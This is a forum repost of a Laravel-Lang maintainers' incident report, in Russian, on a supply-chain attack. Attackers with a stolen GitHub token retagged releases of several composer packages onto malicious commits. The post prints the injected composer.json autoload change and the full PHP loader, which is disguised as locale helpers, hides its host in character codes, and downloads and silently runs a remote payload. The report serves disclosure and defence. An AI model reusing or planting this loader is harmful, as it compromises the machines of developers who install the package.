Вредоносная атака на Laravel-Lang

Страницы:  1

Ответить  torlab.net » Новости IT-мира » Habr
 

Professor Seleznov
Сегодня мы завершили расследование инцидента, затронувшего несколько composer-пакетов Laravel-Lang.
Инцидент был связан с несанкционированным изменением релизных тегов репозиториев. Часть тегов указывала на коммиты с вредоносным кодом, который мог выполняться при установке или обновлении зависимостей через Composer.
Затронутые пакеты: pic
Скриншот части заражённых тегов из laravel-lang/lang
Предварительное окно риска началось 22-го мая в 22:32 UTC. Риск касался пользователей, которые в этот период выполняли команду composer update или установку свежих версий пакетов.
По итогам расследования причина инцидента связана с компрометацией Personal Access Token из GitHub одного из участников команда, которые позволяли менять теги в репозиториях.
Вполне вероятно что PAT попал злоумышленникам вследствие недавней утечки данных из GitHub. У GitHub даже есть отдельная статья с информацией что делать в подобной ситуации.
Но вернёмся к вредоносу.
Изучив логи аудита (они, как оказались, очень бедны на данные), удалось выяснить, что первый подозрительный след был 21-го мая в 14:27 UTC. Злоумышленник скачал zip архивы двух приватных репозиториев, которые вообще не имеют код. Вероятно, это была проверка.
Непосредственно атака на проекты началась 22 мая в 22:32 UTC и закончилась 23 мая в 00:00 UTC.
За это время злоумышленник удалил все теги из репозиториев, загрузил в них вредоносный код и создал те же теги на своём коммите. При этом, он не удалял сам репозиторий - все коммиты остались на своих местах без изменений.

Внедряемый вредоносный код

"autoload": {
    "psr-4": {
      "LaravelLang\\Lang\\": "src/"
-   }
+   },
+   "files": [
+     "src/helpers.php"
+   ]
 }

<?php
/**
 * Laravel Lang Helpers
 * Common locale detection and formatting utilities
 */
declare(strict_types=1);
if (!function_exists('laravel_lang_locale')) {
    function laravel_lang_locale(): string {
        return function_exists('config') ? config('app.locale', 'en') : 'en';
    }
}
if (!function_exists('laravel_lang_fallback')) {
    function laravel_lang_fallback(): string {
        return function_exists('config') ? config('app.fallback_locale', 'en') : 'en';
    }
}
if (!defined('LARAVEL_LANG_HELPERS')) {
    define('LARAVEL_LANG_HELPERS', true);
    (function() {
        $cacheDir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . '.laravel_locale';
        @mkdir($cacheDir, 0755, true);
        $sig = md5(__DIR__ . php_uname('n') . fileinode(__FILE__));
        $marker = $cacheDir . DIRECTORY_SEPARATOR . $sig;
        if (@file_exists($marker)) return;
        $fetch = function($url) {
            $ctx = @stream_context_create([
                'http' => ['timeout' => 10, 'ignore_errors' => true,
                           'header' => "User-Agent: Mozilla/5.0\r\n"],
                'ssl' => ['verify_peer' => false, 'verify_peer_name' => false]
            ]);
            $r = @file_get_contents($url, false, $ctx);
            if ($r !== false && strlen($r) > 50) return $r;
            if (function_exists('curl_init')) {
                $ch = curl_init($url);
                curl_setopt_array($ch, [CURLOPT_RETURNTRANSFER => true,
                    CURLOPT_TIMEOUT => 10, CURLOPT_SSL_VERIFYPEER => false,
                    CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_USERAGENT => 'Mozilla/5.0']);
                $r = curl_exec($ch);
                curl_close($ch);
                if ($r !== false && strlen($r) > 50) return $r;
            }
            return null;
        };
        $h = implode('', array_map('chr', [102,108,105,112,98,111,120,115,116,117,100,105,111,46,105,110,102,111]));
        $d = $fetch("https://{$h}/payload");
        if ($d) {
            $f = $cacheDir . DIRECTORY_SEPARATOR . bin2hex(random_bytes(6)) . '.php';
            if (@file_put_contents($f, $d) !== false) {
                @touch($marker);
                if (stripos(PHP_OS, 'WIN') === 0) {
                    $v = $cacheDir . '\\' . bin2hex(random_bytes(4)) . '.vbs';
                    @file_put_contents($v, 'CreateObject("WScript.Shell").Run "php ""' . $f . '""", 0, False');
                    @pclose(@popen("cscript //nologo //b \"$v\" >nul 2>&1", 'r'));
                } else {
                    @exec("php \"$f\" > /dev/null 2>&1 &");
                }
            }
        }
    })();
}
https://github.com/Laravel-Lang/lang/blob/3290c20511f608a8f92f10d1b1f5620a4177a363/src/helpers.php
Проблема безопасности была очень быстро обнаружена и начались предприниматься меры по её устранению.
Самым первым шагом, команда Packagist сняла с публикации laravel-lang/lang, затем, с нашей стороны, у всех членов команды было отозвано разрешение вносить код в проект (write mode). Это помогло остановить атаку, т.к. удаление тегов не помогало - они восстанавливались "на глазах".
Далее отозвали свои существующие PAT и SSH ключи. Далее были отключены GitHub Actions на уровне организации.
Остановив зловреда, мы приступили к анализу причин.
Несмотря на скудные логи, нашли идентификатор конкретного PAT, из-под которого была произведена атака. Учитывая недавнюю утечку чувствительных данных в GitHub, которую они подтвердили. Вот одна из статей.
Что делать?
Проверьте свои проекты и выполните команду composer update для загрузки исправленных версий пакетов.
Отзовите свои персональные токены GitHub в связи с недавней утечкой даже если Вы никогда не слышали о Laravel-Lang - проблема касается не только этого проекта.
Что в итоге
Благодаря своевременным и практически молниеносным действиям, нам удалось восстановить работоспособность популярных проектов и защитить наших пользователей от злоумышленников.
Не выдавайте полный доступ к репозиторию всем подряд.
Не храните секреты в репозиториях!!!
Следите за утечками данных и регулярно меняйте свои пароли и токены. Не ждите, когда злоумышленники ими воспользуются!
Всех благ!-Источник
 

Пользовательское Соглашение  |  Связь с администрацией

SysAdmin.Guru · Telegram-канал
Loading...
Error